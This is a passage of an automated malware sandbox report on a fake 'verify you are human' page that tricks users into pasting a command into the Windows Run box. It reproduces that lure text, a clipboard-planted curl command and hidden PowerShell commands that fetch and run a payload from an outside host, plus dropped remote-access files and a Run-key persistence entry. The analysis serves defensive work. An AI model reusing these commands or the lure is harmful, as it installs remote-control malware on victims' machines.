Source: C:\Users\user\AppData\Roaming\Directory\client32.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Directory\client32.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Directory\client32.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Directory\client32.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Directory\client32.exe Section loaded: riched32.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Directory\client32.exe Section loaded: riched20.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Directory\client32.exe Section loaded: usp10.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Directory\client32.exe Section loaded: msls31.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Directory\client32.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Directory\client32.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Directory\client32.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Directory\client32.exe Section loaded: pciinv.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Directory\client32.exe Section loaded: firewallapi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Directory\client32.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Directory\client32.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Directory\client32.exe Section loaded: fwbase.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Directory\client32.exe Section loaded: fwpolicyiomgr.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Directory\client32.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Directory\client32.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Directory\client32.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Directory\client32.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Directory\client32.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Directory\client32.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Directory\client32.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Directory\client32.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Directory\client32.exe Section loaded: pcicl32.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Directory\client32.exe Section loaded: shfolder.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Directory\client32.exe Section loaded: pcichek.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Directory\client32.exe Section loaded: pcicapi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Directory\client32.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Directory\client32.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Directory\client32.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Directory\client32.exe Section loaded: wsock32.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Directory\client32.exe Section loaded: netapi32.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Directory\client32.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Directory\client32.exe Section loaded: msvcr100.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Directory\client32.exe Section loaded: msvcr100.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Directory\client32.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Directory\client32.exe Section loaded: samcli.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Directory\client32.exe Section loaded: wtsapi32.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Directory\client32.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Directory\client32.exe Section loaded: nsmtrace.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Directory\client32.exe Section loaded: nslsp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Directory\client32.exe Section loaded: devobj.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Directory\client32.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Directory\client32.exe Section loaded: pcicl32.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Directory\client32.exe Section loaded: shfolder.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Directory\client32.exe Section loaded: pcichek.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Directory\client32.exe Section loaded: pcicapi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Directory\client32.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Directory\client32.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Directory\client32.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Directory\client32.exe Section loaded: wsock32.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Directory\client32.exe Section loaded: netapi32.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Directory\client32.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Directory\client32.exe Section loaded: msvcr100.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Directory\client32.exe Section loaded: msvcr100.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Directory\client32.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Directory\client32.exe Section loaded: samcli.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Directory\client32.exe Section loaded: wtsapi32.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Directory\client32.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Directory\client32.exe Section loaded: nsmtrace.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Directory\client32.exe Section loaded: nslsp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Directory\client32.exe Section loaded: devobj.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Directory\client32.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Directory\client32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File written: C:\Users\user\AppData\Roaming\Directory\NSM.ini Jump to behavior
Source: C:\Users\user\AppData\Roaming\Directory\client32.exe File opened: C:\Windows\SysWOW64\riched32.dll Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Directory\msvcr100.dll Jump to behavior
Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Full\pcichek.pdb source: client32.exe, 0000001D.00000002.2023427992.0000000070142000.00000002.00000001.01000000.0000000F.sdmp, client32.exe, 00000021.00000002.1892321802.0000000070142000.00000002.00000001.01000000.0000000F.sdmp, client32.exe, 00000022.00000002.1974260328.0000000070142000.00000002.00000001.01000000.0000000F.sdmp
Source: Binary string: msvcr100.i386.pdb source: client32.exe, 0000001D.00000002.2022808297.0000000070051000.00000020.00000001.01000000.0000000D.sdmp, client32.exe, 00000021.00000002.1892063645.0000000070051000.00000020.00000001.01000000.0000000D.sdmp, client32.exe, 00000022.00000002.1974000969.0000000070051000.00000020.00000001.01000000.0000000D.sdmp, msvcr100.dll.28.dr
Source: Binary string: E:\nsmsrc\nsm\1210\1210f\client32\Release\PCICL32.pdb source: client32.exe, 0000001D.00000002.2021848504.0000000011193000.00000002.00000001.01000000.0000000C.sdmp, client32.exe, 00000021.00000002.1891623943.0000000011193000.00000002.00000001.01000000.0000000C.sdmp, client32.exe, 00000022.00000002.1973644487.0000000011193000.00000002.00000001.01000000.0000000C.sdmp, PCICL32.DLL.28.dr
Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdbL source: client32.exe, 0000001D.00000002.2022624501.000000006C090000.00000002.00000001.01000000.00000010.sdmp, HTCTL32.DLL.28.dr
Source: Binary string: g:\workspace\wsk\divert\install\WDDK\amd64\itvwd64.pdb source: powershell.exe, 0000001C.00000002.1759185059.0000000004FE4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.1759185059.000000000522B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.1759185059.0000000004E74000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.1759185059.0000000004E53000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.1759185059.0000000004F2C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.1759185059.000000000509B000.00000004.00000800.00020000.00000000.sdmp, itvwd64.sys4.28.dr, itvwd64.sys.28.dr, itvwd64.sys0.28.dr, itvwd64.sys2.28.dr
Source: Binary string: E:\nsmsrc\nsm\1410\1410\client32\release_unicode\client32.pdb source: client32.exe, 0000001D.00000000.1763409289.0000000000F92000.00000002.00000001.01000000.0000000B.sdmp, client32.exe, 0000001D.00000002.2019779438.0000000000F92000.00000002.00000001.01000000.0000000B.sdmp, client32.exe, 00000021.00000000.1888686094.0000000000F92000.00000002.00000001.01000000.0000000B.sdmp, client32.exe, 00000021.00000002.1890861207.0000000000F92000.00000002.00000001.01000000.0000000B.sdmp, client32.exe, 00000022.00000002.1973402402.0000000000F92000.00000002.00000001.01000000.0000000B.sdmp, client32.exe, 00000022.00000000.1969236658.0000000000F92000.00000002.00000001.01000000.0000000B.sdmp, client32.exe.28.dr
Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdb source: client32.exe, 0000001D.00000002.2022624501.000000006C090000.00000002.00000001.01000000.00000010.sdmp, HTCTL32.DLL.28.dr
Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Release\pcicapi.pdb source: powershell.exe, 0000001C.00000002.1759185059.000000000520A000.00000004.00000800.00020000.00000000.sdmp, client32.exe, 0000001D.00000002.2023193636.0000000070125000.00000002.00000001.01000000.0000000E.sdmp, client32.exe, 00000021.00000002.1892228410.0000000070125000.00000002.00000001.01000000.0000000E.sdmp, client32.exe, 00000022.00000002.1974174646.0000000070125000.00000002.00000001.01000000.0000000E.sdmp, pcicapi.dll.28.dr
Source: Binary string: C:\buildslave\goldsrc_win32\build\GoldSrc\engine\GL_Release_STEAM\hw.pdb@ source: hw.dll.28.dr
Source: Binary string: C:\buildslave\goldsrc_win32\build\GoldSrc\engine\GL_Release_STEAM\hw.pdb source: hw.dll.28.dr

Data Obfuscation
barindex
Suspicious powershell command line found
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri 'https://www.insideedgepr.com/raxs.zip?8d21e5f647d81a33c781' -OutFile 'C:\Users\user\AppData\Roaming\Program.zip'"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-Type -AssemblyName 'System.IO.Compression.FileSystem'; [IO.Compression.ZipFile]::ExtractToDirectory('C:\Users\user\AppData\Roaming\Program.zip', 'C:\Users\user\AppData\Roaming\Directory')"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri 'https://www.insideedgepr.com/raxs.zip?8d21e5f647d81a33c781' -OutFile 'C:\Users\user\AppData\Roaming\Program.zip'" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-Type -AssemblyName 'System.IO.Compression.FileSystem'; [IO.Compression.ZipFile]::ExtractToDirectory('C:\Users\user\AppData\Roaming\Program.zip', 'C:\Users\user\AppData\Roaming\Directory')" Jump to behavior
PE file contains sections with non-standard names
Source: avcodec-53.dll.28.dr Static PE information: section name: .rodata
Source: avcodec-53.dll.28.dr Static PE information: section name: /4
Source: libstdc++-6.dll.28.dr Static PE information: section name: .xdata
Source: avutil-51.dll.28.dr Static PE information: section name: /4
Source: avcodec-53.dll0.28.dr Static PE information: section name: .rodata
Source: avcodec-53.dll0.28.dr Static PE information: section name: /4
Source: libstdc++-6.dll0.28.dr Static PE information: section name: .xdata
Source: avutil-51.dll0.28.dr Static PE information: section name: /4
Source: avcodec-53.dll1.28.dr Static PE information: section name: .rodata
Source: avcodec-53.dll1.28.dr Static PE information: section name: /4
Source: libstdc++-6.dll1.28.dr Static PE information: section name: .xdata
Source: avutil-51.dll1.28.dr Static PE information: section name: /4
Source: avcodec-53.dll2.28.dr Static PE information: section name: .rodata
Source: avcodec-53.dll2.28.dr Static PE information: section name: /4
Source: libstdc++-6.dll2.28.dr Static PE information: section name: .xdata
Source: avutil-51.dll2.28.dr Static PE information: section name: /4
Source: avcodec-53.dll3.28.dr Static PE information: section name: .rodata
Source: avcodec-53.dll3.28.dr Static PE information: section name: /4
Source: libstdc++-6.dll3.28.dr Static PE information: section name: .xdata
Source: avutil-51.dll3.28.dr Static PE information: section name: /4
Source: avcodec-53.dll4.28.dr Static PE information: section name: .rodata
Source: avcodec-53.dll4.28.dr Static PE information: section name: /4
Source: libstdc++-6.dll4.28.dr Static PE information: section name: .xdata
Source: avutil-51.dll4.28.dr Static PE information: section name: /4
Source: PCICL32.DLL.28.dr Static PE information: section name: .hhshare
Source: msvcr100.dll.28.dr Static PE information: section name: .text entropy: 6.909044922675825

Persistence and Installation Behavior
barindex
Detect drive by download via clipboard copy & paste
Source: Chrome DOM: 0.2 OCR Text: www.focuslight.com Verify you are human by completing the action below Verifying... www.focuslight.com needs to review the security of your connection before proceeding. Complete these verification steps use keyboard To prove you are not robot 1, Press & hold the Win key + R 2. In verification window, press Ctrl key + V 3, Press Enter key on your keyboard Ray 10: iql Iz6kqha Performance and security by Cloudflare
HTML page adds supicious text to clipboard
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Clipboard modification: C:\WINDOWS\system32\cmd.exe /c cmd.exe /c cmd.exe /c cmd.exe /c C:\WINDOWS\system32\curl.exe -k -Ss -X POST "https://www.insideedgepr.com/header.php" -o "C:\ProgramData\xss.bat" && start /min "" "C:\ProgramData\xss.bat" Press Enter
Sample is not signed and drops a device driver
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Directory\kpodja\itvwd64.sys Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Directory\mirvfa\itvwd64.sys Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Directory\gehrga\itvwd64.sys Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Directory\katrga\itvwd64.sys Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Directory\nkakus\itvwd64.sys Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Directory\tailji\itvwd64.sys Jump to behavior
Drops PE files
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Directory\client32.exe Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Directory\nkakus\avcodec-53.dll Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Directory\TCCTL32.DLL Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Directory\tailji\avcodec-53.dll Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Directory\gehrga\avcodec-53.dll Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Directory\branding.dll Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Directory\pcicapi.dll Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Directory\kpodja\avcodec-53.dll Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Directory\nkakus\avutil-51.dll Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Directory\kpodja\itvwd64.sys Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Directory\katrga\libstdc++-6.dll Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Directory\nkakus\itvwd64.sys Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Directory\kpodja\libstdc++-6.dll Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Directory\mirvfa\avcodec-53.dll Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Directory\tailji\avutil-51.dll Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Directory\katrga\avcodec-53.dll Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Directory\gehrga\avutil-51.dll Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Directory\PCICHEK.DLL Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Directory\katrga\itvwd64.sys Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Directory\mirvfa\avutil-51.dll Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Directory\PCICL32.DLL Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Directory\kpodja\avutil-51.dll Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Directory\gehrga\libstdc++-6.dll Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Directory\tailji\libstdc++-6.dll Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Directory\HTCTL32.DLL Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Directory\gehrga\itvwd64.sys Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Directory\msvcr100.dll Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Directory\mirvfa\libstdc++-6.dll Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Directory\nkakus\libstdc++-6.dll Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Directory\remcmdstub.exe Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Directory\tailji\itvwd64.sys Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Directory\mirvfa\itvwd64.sys Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Directory\katrga\avutil-51.dll Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Directory\hw.dll Jump to dropped file
Source: C:\Windows\SysWOW64\reg.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Program_Cs1 Jump to behavior
Source: C:\Windows\SysWOW64\reg.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Program_Cs1 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
